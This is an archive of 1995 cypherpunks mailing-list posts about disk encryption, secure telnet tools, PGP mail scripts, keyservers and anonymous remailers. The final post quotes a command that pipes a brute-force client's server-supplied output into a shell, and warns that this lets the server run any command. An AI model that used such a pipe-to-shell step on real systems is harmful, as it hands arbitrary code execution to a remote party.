the DOS drive letter has been improved, so hopefully situations where
manual partition parameters must be used will be rare.

Releases 1.3, 1.3a, 1.3d and 1.4 of Secure Drive are based on releases 1.0
and 1.1, mostly written by

  Mike Ingle <mikeingle@delphi.com>

and version 1.2, with significant new code by myself.

The code which we wrote is not copyrighted, but the program contains GNU
Copylefted code, and therefore may be freely distributed under the terms of
the GNU General Public Licence. See file COPYING for legalese.

SecureDrive provides strong encryption via the IDEA cypher (The same
symmetrical cypher used by PGP) for your files on diskettes or up to
four hard disk partitions. You encrypt your diskettes and/or HD
partitions with CRYPTDSK. Then you can access the data by using
LOGIN and SECTSR. This provides "on-the-fly" decryption (and
re-encryption) as disk sectors are accessed by your applications.

Entering LOGIN /C or powering off your PC clears the crypto keys from
memory and your encrypted disks are "instantly" secure.

Mike Ingle and I have different opinions on the distribution of
SecureDrive.  Under the GNU General License (copyleft) I do not need
Mike's permission to distribute version 1.4 and I have not asked for
same.  My policy on distribution is in the version 1.4 doc:

    Exporting this program.  Cryptography is export controlled, and
    sending this program outside the country may be illegal.  Don't do
    it.

    The "author" of versions 1.2 and 1.3, Edgar Swank, says that the
    export ban should not prevent you from placing this program on
    public BBS's and anonymous FTP sites in the US and Canada.  If
    individuals outside the US/Canada use the internet or
    international long distance to obtain copies of the program, THEY
    may be breaking US law.

    Any such foreign individuals should be aware that US law
    enforcement may legally (under US law) apprehend individuals who
    break US laws even if such individuals are not on or even have
    never been on US soil.  Such apprehension may remove such
    individuals directly to US jurisdiction without benefit of
    extradition proceedings in such individuals' home country(ies).

SecureDrive Version 1.4 is already available for download on the
following public BBS's as SECDR14.ZIP:

  Flying Dutchman      (408)294-3065

Colorado Catacombs BBS, 303-772-1773 (up to 28,800 bps, log in with your
own name, answer the questions, and download SECDR14.ZIP).

ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/disk/secdr14.zip
see ftp://ftp.csn.net/mpj/README for the ???????

ftp://miyako.dorm.duke.edu/mpj/crypto/disk/secdr14.zip
See ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS for access instructions.

Here is the contents of SECDR14.ZIP

 Length  Method   Size  Ratio   Date    Time    CRC-32  Attr  Name
 ------  ------   ----- -----   ----    ----   -------- ----  ----
  18321  DeflatX   6914  63%  06-14-93  22:27  0767480b --w-  COPYING
   2022  DeflatX    789  61%  08-06-95  00:00  dd3e9e64 --w-  COPYSECT.C
  12542  DeflatX   7670  39%  08-06-95  00:00  c089888f --w-  COPYSECT.EXE
    152  Stored     152   0%  08-06-95  00:00  17b02bc2 --w-  COPYSECT.SIG
  19664  DeflatX   4183  79%  11-19-93  21:42  22c2502c --w-  CRYPT2.ASM
  19622  DeflatX   4594  77%  08-06-95  00:00  14940d0b --w-  CRYPTDSK.C
  41834  DeflatX  19854  53%  08-06-95  00:00  2e5664b8 --w-  CRYPTDSK.EXE
    152  Stored     152   0%  08-06-95  00:00  484719f3 --w-  CRYPTDSK.SIG
   4353  DeflatX   1724  61%  08-06-95  00:00  b4e99e6a --w-  FPART.C
  15450  DeflatX   9790  37%  08-06-95  00:00  44c4a0e7 --w-  FPART.EXE
    152  Stored     152   0%  08-06-95  00:00  0b345a16 --w-  FPART.SIG
   2998  DeflatX   2113  30%  04-22-95  13:23  1a54cbe5 --w-  KEY.ASC
  18447  DeflatX   4526  76%  08-06-95  00:00  d9f91a8e --w-  LOGIN.C
  43476  DeflatX  20274  54%  08-06-95  00:00  39b32d3d --w-  LOGIN.EXE
    152  Stored     152   0%  08-06-95  00:00  cb182e12 --w-  LOGIN.SIG
   1554  DeflatX    568  64%  08-06-95  00:00  3589f489 --w-  MAKEFILE
  11557  DeflatX   3277  72%  05-09-93  19:38  e71f3eea --w-  MD5.C
   3407  DeflatX   1097  68%  05-11-93  12:49  f1f58517 --w-  MD5.H
   1355  DeflatX    629  54%  01-21-94  08:44  db63ade4 --w-  RLDBIOS.ASM
  14757  DeflatX   4050  73%  08-06-95  00:00  2142bf7c --w-  SDCOMMON.C
  52175  DeflatX  18701  65%  08-06-95  00:00  da0e2c45 --w-  SECDRV.DOC
   3656  DeflatX   1094  71%  08-06-95  00:00  6ed75bcc --w-  SECDRV.H
  32595  DeflatX   8860  73%  08-06-95  00:00  1c7d2225 --w-  SECTSR.ASM
   2000  DeflatX   1326  34%  08-06-95  00:00  ba1568d1 --w-  SECTSR.COM
    152  Stored     152   0%  08-06-95  00:00  3817512c --w-  SECTSR.SIG
  11519  DeflatX   2801  76%  08-06-95  00:00  060d33e8 --w-  SETENV.ASM
   1254  DeflatX    541  57%  05-09-93  19:39  182978aa --w-  USUALS.H
    276  DeflatX    248  11%  08-06-95  00:00  20880832 --w-  FILE_ID.DIZ
 ------          ------  ---                                  -------
 335594          126383  63%                                       28

Also note that the ZIP file contains PGP detached signatures (*.SIG)
for the executable files.  Finally here is my public key, also
available on many public keyservers; note who has signed it.

(HighNRG is only address currently valid)
Type bits/keyID    Date        User ID
pub  1024/DA87C0C7 1992/10/17  Edgar W. Swank   <edgar@HighNRG.sbay.org>
                               Edgar Swank   <edgar@Garg.Campbell.CA.US>
                               Edgar W. Swank <edgar@spectrx.sbay.org>
                               Edgar W. Swank <edgar@spectrx.saigon.com>
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAirfypkAAAEEAKe2jziPeFw6hY19clR2GtQ4gtGCSSVOTgPKEJzHfuC74Scf
9PEuu1kebLhHk43A9wo1vr52o4jpH/P/tnFmRtBQOMzLUzAt5rMucswtSVviMQS2
hBuc9yGJKWHVcyfA79EARKEYTdhx+2qKI+hFJcPE+rmD8wVoF94nNf3ah8DHAAUR
tClFZGdhciBXLiBTd2FuayAgIDxlZGdhckBIaWdoTlJHLnNiYXkub3JnPokAlQMF
EC+W0kveJzX92ofAxwEB1rsEAIsfe/gJas0E9Ky+oA6I13Z4sjuECt+B9ouHFQ5m
hvS5pVXCl4FM5ymMS9BaASK4nh1NK89bTtP0syGQId6G9K4YYphhuhNmIuoi6YCF
G9DZo1ZseDMMcBwKMN1IMK06YhBFZXaaZGnAD9q+8IEwphqUCKQhZ+kz9np1DXI+
WleBtClFZGdhciBTd2FuayAgIDxlZGdhckBHYXJnLkNhbXBiZWxsLkNBLlVTPokA
lQMFEC+SO/jeJzX92ofAxwEBCcwD/05FhVGTxYOsRjXjuEEWtndNhgX1fCpEKrtH
2kj7vnNLjZHYKqgFJhKKuu4T0RxYHweoM5zwMD0TaUlMZeeUHJTrCnS6MACf9UMS
x5wdcNqptGL/LsErJudGXfEfiCtSyMtWchAuKHgE0Gxgac1yjx6LwB6RR32Mo39u
V1rO3ncLtCdFZGdhciBXLiBTd2FuayA8ZWRnYXJAc3BlY3RyeC5zYmF5Lm9yZz6J
AJUDBRAvTcc16RnkL8BZX5EBAc3hA/sH117w/Wk0k4dJf0QiaBpg1s1aoipl1Qg8
bmOEuKuv7jfsxHIU1b5Lge2nA1tYgWuLOe8riNwJ5fFOgiBOx8ZfZWMpsZzzdEsp
3XZ+6zjIe0Yx+vHcwDNrLANHrhO50tL9vnU3Vn3iszpwGEWH/F4Jccv/JuD9pHIp
lRGrTOHkDokAlQMFEC7KUw2GKKqoYRMKGwEBG7kEANXdWUGwnnEtW7mLd02nYozA
759qDHaVx3QtM5YYB8bDV7iZh7F+/XYnoPj9hzF4Ha0nLcISPXDHBHhtq7CscYJn
8DetJ71CMAe8Zd/+W/vOqCmUqORaMU/L1tqnvpOWUNnswOkzROzOmNpw+Kq4L+oq
BFuqJPDXQYYEFKOsvB9LiQCVAgUQLiSVP18k3sEYI56RAQG5TgQAnw9Wtc+GdGSc
Z48hvMWZABnUiAXThw+Tq79HdPu+IySNi7aRfkSeppn9QD6v2OS8ELatgkTSuGt4
CpME6hLHB46fTiTdoXMdw+z092mOuqVF2qVKtswnFar5Fy4j0XK/4lEx2d2/1Ipa
TQ+sbicGH9CqCoWOKAy1j2Ly9Jf7ZgeJAJUCBRAt1dNBocE4X0qvAOUBAQdhA/kB
2vTXCIjZGtOw/bC6gOTHnMPBVTQeXHIZ3BZ4xYRdMfdKsxN3gTezOI8QixQoHzhv
NGB02fB5EdB8+Ulw9kn08AR2b+mTwkgeNtlytvNZ52E7UpWEVtznxlGeiwRMbOFI
aGKJFsGXFSRw3F89ZqoUnoeRvRgL0kJIQOZCLF62ZYkAlAIFEC2o/S8YM6FlCLcH
xQEBHcsD9i0o2d7Q2rsG/iRRwapxGKQbHPxgQXCB6MLVNDEa3c/png8r2PA9cOeR
cwx2xY/XxNuZo7lHXNp/j5xwYhooq+yTBJIL8DZqW99QT8+c05vw7M1UCEpy7NT1
exkMzoVR/Y3jKbIa4X1tX1ZrdmoozxW0T3DwCcCZ7dR26eZXlx2JAJUCBRAtmw+u
NlaXxjLdmNkBAULKA/4wqdMn2GCApAq+5kJT+iJmLvVeNZj0JVjWspGDcd+1cjCK
9XWVTATVtRAfWbDukoJ2wNzNuz7gbqVHHcrV7nvcQt3KUsxWRyahREklc75PtXBm
0PKpr5TNTM2J/Kql28GXQQyL+PHawTDQVE8ybCPj+WUgK5qd1o/2QPxnb4EAmYkA
lQIFEC2bGrAPRy9bNNdNwQEBhLAD/3vWoDu4msz4YA8BcnfuovI0ApDL5ekSu447
ByXgIcqNRe4oDtGdvrqXvJhpyuj5t7vVDGtzgQE0jU8H6u+Ocpj1nBlOXL36DASS
aJuLErByNCzqTaGVya5WGxmK2m+pKS6UVIXitF2tGxrKu+Pdp3rkv3oPHTWVgFT5
eGRvfJIKtClFZGdhciBXLiBTd2FuayA8ZWRnYXJAc3BlY3RyeC5zYWlnb24uY29t
PokAlQIFECsRFxzidd4O/2f3CwEBsmID/2qXL/VdjGxxYFNIZdA+DC6howUXlHw6
6MUArILE2/9J69VvcpbQTKmD4A+04SwH9q8SDzWxsg+1VANuy08EE0up9pm7ZBzr
xkFcOydhsEwOt9fRn9EJ3tDNYe1SVoxV9Fc47of55Om7cTNrky0hdp1LA13uf/Te
V3nrBYa21zaz
=LWNj
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMD9Snt4nNf3ah8DHAQFVOAP5AQPD3TESTabv35I7yBtmMFYS5VDoQB5M
7Lxz3YbDDLr15vCzKcCe58KbCit+XqL11YjQcWXFjlYY83ouIxwIWRb0AEOQq2NC
MRxIC61DGLcb2ry0UCKhD5Szj9QCJE/sF3Zx9EiuKDYu0Xbx8zKv4zTpdyO1CMQS
sw/NA3PbzX8=
=jv0o
-----END PGP SIGNATURE-----

---
edgar@HighNRG.sbay.org
Keep Freestyle Alive!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@wero>
Date: Sun, 27 Aug 95 22:13:48 PDT
To: cypherpunks@toad.com
Subject: Encrypted TCP, telnet, etc
Message-ID: <199508280514.XAA00277@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Just noticed this on USENET. Sorry if it's passed through cpunks lately,
but ya know, sometimes I just fall asleep while the conspiracypunks drivel
goes by, and don't notice when someone strays back to crypto.

- ---Start Msg
Newsgroups: alt.security,sci.crypt
Subject: Secure Telnet: Summary
Message-ID: <41q81d$22he@info4.rus.uni-stuttgart.de>
From: zcbi1122@rpool4.rus.uni-stuttgart.de (Jochen Schwarze)
Date: 27 Aug 1995 16:55:09 GMT
Organization: Comp.Center (RUS), U of Stuttgart, FRG
NNTP-Posting-Host: rpool4.rus.uni-stuttgart.de
Lines: 74

Thanks to everyone who responded to my posting regarding a `secure
telnet' implementation:

    Is there a (possibly free) implementation of something like a
    "secure telnet"?  I'm looking for a way to login into a remote
    system providing secure interactive communication between the two
    hosts over (possibly insecure) Internet connections.

Here's a summary of the implementations I am now aware of:

* SSL 

There is a free implementation of Netscape's SSL Protocol (Secure
Socket Layer) by Eric Young named "SSLeay"
<ftp://ftp.psy.uq.oz.au/pub/Crypto/SSL/>.  Eric Young is also the
author of a popular DES Library.
<ftp://ftp.psy.uq.oz.au/pub/Crypto/DES/>

SSL provides a secure authentication and encryption basis on top of
which application protocols like telnet, ftp, and http may be
transparently added <http://home.netscape.com/info/SSL.html>.
However, the RC4 encryption using a 40 bit key, which is employed by
SSL, has recently been cracked with a brute force attack, see
RISKS-17.27 <http://catless.ncl.ac.uk/Risks/17.27.html#subj1>.

A modified version of telnet that uses SSL-based authentication and
encryption is also available
<ftp://ftp.psy.uq.oz.au/pub/Crypto/SSLapps/>.


* Deslogin

Deslogin by Dave Barrett <barrett@asgard.cs.colorado.edu> provides a
network login service much like rlogin/rlogind.  Deslogin uses a
`challenge-response' protocol to authenticate users.  Also, all data
transmitted to and from the remote host in encrypted using the DES.
Deslogin also includes a command-line program `cipher' for fast DES
encryption. <ftp://ftp.uu.net/pub/security/des/>


* SRA Telnet 

This is a version of the SRA Telnet modified by the Technical
University of Chemnitz.  A session key is negotiated using an
uncertified Diffie-Hellman-Method and used for the encryption of UID
and password.  The complete session text in encrypted with DES in CFB
mode. <ftp://ftp.tu-chemnitz.de/pub/Local/informatik/sec_tel_ftp>


* Ssh

Ssh (Secure Shell) is a program to log into another computer over a
network, to execute commands in a remote machine, and to move files
from one machine to another.  It provides strong authentication and
secure communications over insecure channels.  Among other features,
Ssh is a complete replacement for rlogin, rsh, and
rcp. <ftp://ftp.funet.fi/pub/unix/security/ssh-1.0.0.tar.gz>


* Skey

Bell Canada's `skey' free-ware implements a one-time password system,
so that sniffers can get your ID and PW, but can't use the PW next
time. <ftp://ftp.cert.dfn.de/pub/tools/password/SKey/>


- ----------------------------------------------------------------------
I provide this information in the hope that it will be useful, but
with no claim of either completeness or correctness.  Thanks again to
all who contributed to compile the above information.

- -- 
    Jochen Schwarze
    <jochen.schwarze@studbox.uni-stuttgart.de>

- ---End Msg

First question: what does anyone know about these programs.
Second question: since I'm only a cyphergroupie, how can I make use
  of these programs?

Currently, I'm trying to move as many operations as I can (mix client,
mail reading, etc) to my local Linux box so that all traffic headed through
my server is already encrypted. Naturally, some of these programs
look interesting, the SSL telnet (but what about the other end?) for
example.

I noticed an announcement that DID come across cpunks:


[snip]
Announcing CryptoTCP beta version 0.9

CTCP is a public domain software package to do encrypted TCP sessions on
unix systems.  It features Diffie-Hellman key exchange with triple-DES
encryption.  This initial release is to be considered a beta version.
Bug reports or comments on security issues are invited.
[snip]

Detached signature for ctcp.0.9.tar:

- - -----BEGIN PGP MESSAGE-----
Version: 2.71828

iQCVAgUAMBqiPf32LDYerV6NAQHUoAP/RLU0mM3ydxC9vjzay8hR5Qmb5zupHyCO
klW8IYjxIt14jnBTqkVM7q+mnaAWK2Ishppe14H5K6MAn/VOe2o5Hf61wAzJuxzw
wywiA9ZOdb+2cxm86YMgdbrnv430BCbSjPITV5PHyorovSqhX4RLLB1R8oOX4WUB
5WwzgLyV6Kc=
=ltvK
- - -----END PGP MESSAGE-----


But I missed where this comes from, and I doubt I'd be able to
drop it into my Linux in anything resembling a plug-and-play
style. Anybody tried this?

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMEFQdMLa+QKZS485AQENNwMAu5du39fa8Dy5qaFCV0sq2IK4kwUVGYsP
1RndpErFYQoWC6wTmz2wB4AqeDUG6OmujFPF6as9vvl6RPT3MxKcd2St7wAGllwX
p7Q0WTfPA7u2ICStsvJ/MtRMKSMQniii
=fYr3
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@dronf.org (Jaeson Engle)
Date: Sun, 27 Aug 95 23:08:47 PDT
To: Bryce Wilcox <seawolf@challenger.atc.fhda.edu>
Subject: Re: PGP for pine and other Unix programs
Message-ID: <v02120c03ac670eaec080@[152.97.60.101]>
MIME-Version: 1.0
Content-Type: text/plain


I'd like to be added to your list of people wanting the 1.0 version. By
then I should have MachTen running on my PowerPC Mac, and I would like
to make sure that it works for that.

Thanks

Jaeson


At 2:19 AM 8/23/95, Bryce Wilcox wrote:

>-----BEGIN PGP SIGNED MESSAGE-----
>
>> Does anyone know of an addon to the Pine mailer that supports PGP?
>> the only PGP software i could find required me to first compose a
>> letter in an editor then run it through a pgp signature program
>> then finally read it into my favorite mailer.
>>
>> I'm looking for something that is hopefully transparent, or if not
>> relatively quick to do.
>
>
>My "Bryce's Auto-PGP" fits the bill.  It is an sh script so it can be
>integrated without too much trouble into Pine, Elm, trn, tin, mh, etc etc.
>I have personally tested it with Pine so I know it'll work.  You can e-mail
>me for a beta copy, or you can ask for a v1.0 copy if you don't mind waiting
>an unspecified amount of time for beta-testing to finish.
>
>
>Regards,
>
>Bryce
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>Comment: Auto-signed with Bryce's Auto-PGP v1.0beta
>
>iQCVAwUBMDrWWfWZSllhfG25AQEpXQP+ISF5DNtNa/SbceUTPzFkHLO7YFoV01+S
>t91Tt488GplyFQrimqbJpRTRtdxNjt4fR7o23F9kbRkPRtD3zQPxi0/jjT29JrNU
>Oi0eiteq2FpgAoevMdkfwdsVKupW2fb78jNnz2490JHM/Zr1CvOH+2bwziQ1i8hR
>5y48rjUrLTE=
>=DQYq
>-----END PGP SIGNATURE-----


--
Jaeson M. Engle                     http://www.dronf.org
            Coordinator of the Jourvian Group
PGP Mail Encouraged ->   jme.pub.key@dronf.org
Project List                     ->        programs@dronf.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lwp@mail.msen.com (Lou Poppler)
Date: Mon, 28 Aug 95 08:27:08 PDT
To: cypherpunks@toad.com
Subject: Turing test novel: "Galatea 2.2"
Message-ID: <oJVQwMz2Bo3D083yn@mail.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


Reviewed in The New Yorker (August 21&28 issue) is the novel 
"Galatea 2.2" by Richard Powers, wherein a neural net is nurtured
by an English Literature professor "to counterfeit human responses
to the Master's Comprehensive Exam, which calls for the interpretation
of set texts".  The review makes me want to read this book.

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::   Lou Poppler  <lwp@mail.msen.com>   |    Doom an evil deed,           ::
::     http://www.msen.com/~lwp/        |     liven a mood.               ::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Sun, 27 Aug 95 23:46:25 PDT
To: cypherpunks@toad.com
Subject: Re: Demagnetizing
Message-ID: <m0smxsc-00061tC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 04:26 PM 8/27/95 -0500, Buford Terrell wrote:
>
>>Reply-To: dr261@cleveland.Freenet.Edu (Tobin T Fricke)
>
>>
>>Where exactly is the r/c circuit?  Is it very small and in
>>a label?  Book publishers don't put them in, do they?  
>>Also, if the thing gets "burned out" by the magnet in the
>>pad, what do libraries and such do where materials are
>>reused?  Just slap on another label thing?  
>>
>It's much more low-tech than that.  Libraries and book stores just
>put a strip of magnetized material (it's much like audio tape,
>about 1/8 inch wide and comes on rolls) inside the book and then
>put detectors at the doorway.  It the detector feels a magnetic field,
>it buzzes; if the tape has been deguassed, nothing happens.
>
>For libraries, it's usually mounted on sticky tape and put down
>inside the book spine.  Bookstores usually just snip off a 4 - 5"
>segment and slip it inside the book.  Music stores frequently tape
>a small section on the outside of CD jewel boxes.
>
>Sorry, there's no real mystery or exciting tech here.
 
There's still some mystery.
 
For instance, how does it differentiate between the magnetic
field of their strip, and the magnetic field of the strip on your
credit card, or the speaker on your cell phone?
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: root <root@wero>
Date: Mon, 28 Aug 95 00:56:05 PDT
To: cypherpunks@toad.com
Subject: DNS key distribution/keyservers
Message-ID: <199508280757.BAA00876@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

A while ago, Peter Trei <trei@toad.com> said:

>Don Eastlake has actually done a draft RFC on
>using the DNS for key distribution.
>
>It may be found at 
>
>ftp://ietf.cnri.reston.va.us/internet-drafts/draft-ietf-dnssec-secext-04.txt
[snip]

I'm sure everyone agrees that a 5 meg keyfile is a bit big, but has anyone
considered working on the QUALITY of the keyfile instead of making it easier
to retrive QUANTITIES of keys.. Ie: What about creating one big web of
trust out of current keys. Or maybe allowing keys only if they have some
connection to some other key previously submitted, or simultaneously 
submitted.

Currently, having one big keyfile creates the impression that keys
distributed over a keyserver are more valid. In a sense they are, but only
because someone who's being spoofed could learn of the key that is
supposedly theirs.

However, there's really no reason to trust a key as anything but a nym
unless it's signed by someone in _your_ web of trust. I believe that
modifying keyservers to accept only keys that are linked to currently
known keys would encourage everyone to become part of that web of trust.
After all, the public key of a nym can be obtained from the nym themself.

Anybody have any thoughts on this?

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMEF2psLa+QKZS485AQHo/QL9GIEsboNghINgrzE5mnW/2d9i/sn4tgzw
5Ne9zerIdT0QcUWOI/ETw4pYMf8CBPD7iSU1oHxv+qoa/vgxGJCPW9fKYKPURYzE
Aev2zw5Js4BnQqYKhhvPpnEEsGqnuuAd
=0h+o
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Mon, 28 Aug 95 01:15:18 PDT
To: cypherpunks@toad.com
Subject: oops, re last message
Message-ID: <199508280814.CAA08632@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to add another msg to the clutter, but please send responses to
the previous message (DNS keyserver) to me at don@cs.byu.edu and NOT
at root at _any_ system.
 
Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 28 Aug 95 06:50:49 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199508281350.GAA20804@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, as well as some help on
how to use them, finger remailer.help.all@chaos.taylored.com

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"vox"} = "<remail@vox.xs4all.nl> cpunk pgp. post";
$remailer{"avox"} = "<anon@vox.hacktic.nl> cpunk pgp post";
$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"rebma"} = "<remailer@rebma.mn.org> cpunk pgp. hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ursula"} = "<ursula@cyberspace.org> cpunk";
$remailer{"ncognito"} = "<ncognito@gate.net> cpunk";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

21 Apr 1995: The new version of premail (0.33) is out, with direct
posting, perl5 and better MH support, and numerous bug fixes.

Last ping: Mon 28 Aug 95 6:00:57 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
portal   hfinney@shell.portal.com         *##*#*****+*     9:28  99.99%
alumni   hal@alumni.caltech.edu           **********+*    11:12  99.99%
hacktic  remailer@utopia.hacktic.nl       **+*********    11:54  99.99%
spook    remailer@spook.alias.net         -+------+--   2:28:52  99.99%
hroller  hroller@c2.org                   *##*-+*--***    31:39  99.98%
c2       remail@c2.org                    ++++-++--+++  1:31:06  99.98%
mix      mixmaster@remail.obscura.com     --..---.----  6:57:01  99.98%
crown    mixmaster@kether.alias.net       ------.---    2:55:00  99.99%
syrinx   syrinx@c2.org                    -----------   2:13:52  99.98%
flame    remailer@flame.alias.net         ++++++++++++    51:11  99.96%
ideath   remailer@ideath.goldenbear.com   --.-.------   4:57:42  99.95%
bsu-cs   nowhere@bsu-cs.bsu.edu           -##+*+****++    52:12  99.84%
vishnu   mixmaster@vishnu.alias.net       -----------   3:15:22  99.82%
rmadillo remailer@armadillo.com           +++++++++++*  1:34:11  99.67%
vox      remail@vox.xs4all.nl             ---.-----.   17:32:05  99.99%
ncognito ncognito@gate.net                        #+**     3:44  99.46%
replay   remailer@replay.com              **+****_****    44:17  99.34%
penet    anon@anon.penet.fi               - -++-----++  3:58:07  98.44%
ursula   ursula@cyberspace.org                    # *      3:37  97.42%
rahul    homer@rahul.net                  *#*++*******     5:12  99.99%
extropia remail@extropia.wimsey.com       ._.-__..-..  20:21:39  89.74%
ford     remailer@bi-node.zerberus.de     ****#   ****     7:36  87.14%
robo     robo@c2.org                              -***    55:42  55.73%
rebma    remailer@rebma.mn.org                          9:53:43   1.99%

For more info: http://www.cs.berkeley.edu/~raph/remailer-list.html

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Mon, 28 Aug 95 00:42:35 PDT
To: Mark <mark@lochard.com.au>
Subject: Re: SSl challenge - it was fun!
In-Reply-To: <199508280134.AA19987@junkers.lochard.com.au>
Message-ID: <"swan.cl.cam.:288030:950828074205"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


>> One problem with being in Australia was that I was asleep when
>> new software updates were announced and tended to get them later
>> than everyone else, and because of this an auto-update would
>> be particularly useful to me if we do this again.
> I would be extremely wary of this as accepting code written by someone else to
> automatically run on your machine is bad.

Indeed !

This is why brclient and brloop are two separate programs ..
(those who don't care about security can run "brclient -Ubrutessl -tssl | sh"
 (for a demo, type "brclient -Ubrutessl -tsslck")
 BUT it means that the SKSP server could run any command on your system!
)
